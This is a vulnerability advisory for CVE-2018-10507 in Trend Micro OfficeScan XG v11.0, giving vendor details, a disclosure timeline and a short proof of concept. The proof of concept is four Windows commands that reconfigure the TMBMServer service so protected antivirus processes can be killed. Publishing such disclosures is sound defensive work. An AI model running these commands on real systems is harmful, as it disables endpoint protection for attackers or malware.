OfficeScan XG version 11.0 suffers from an unauthorized change prevention bypass vulnerability.
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[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/TRENDMICRO-OFFICESCAN-XG-v11.0-UNAUTHORIZED-CHANGE-PREVENTION-SERVICE-BYPASS.txt
[+] ISR: Apparition Security
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Vendor:
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www.trendmicro.com
Product:
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OfficeScan XG v11.0
OfficeScan protects enterprise networks from malware, network viruses, web-based threats, spyware, and mixed threat attacks.
An integrated solution, OfficeScan consists of the OfficeScan agent program that resides at the endpoint and a server program that
manages all agents. The OfficeScan agent guards the endpoint and reports its security status to the server. The server, through the
web-based management console, makes it easy to set coordinated security policies and deploy updates to every agent.
Vulnerability Type:
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Unauthorized Change Prevention Bypass
CVE Reference:
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CVE-2018-10507
Security Issue:
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Attackers or malwarez that can access the system hosting the OfficeScan XG AV, can bypass the antivirus protection feature that prevents unauthorized changes
from being made like killing protected OfficeScan XG processes such as "PccNTMon.exe".
References:
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https://success.trendmicro.com/solution/1119961
Exploit/POC:
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1) net user hacker abc123 /add
2) sc.exe config "TMBMServer" obj= ".\hacker" password= "pwnage"
3) net user hacker /delete
4) shutdown /r
Done!, now kill "PccNTMon.exe" or whatever...
requires Admin permissions to exploit
Network Access:
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Local
Severity:
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Medium
Disclosure Timeline:
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Vendor Notification: June 29, 2017
Vendor releases critical patch and advisory : June 5, 2018
June 7, 2018 : Public Disclosure
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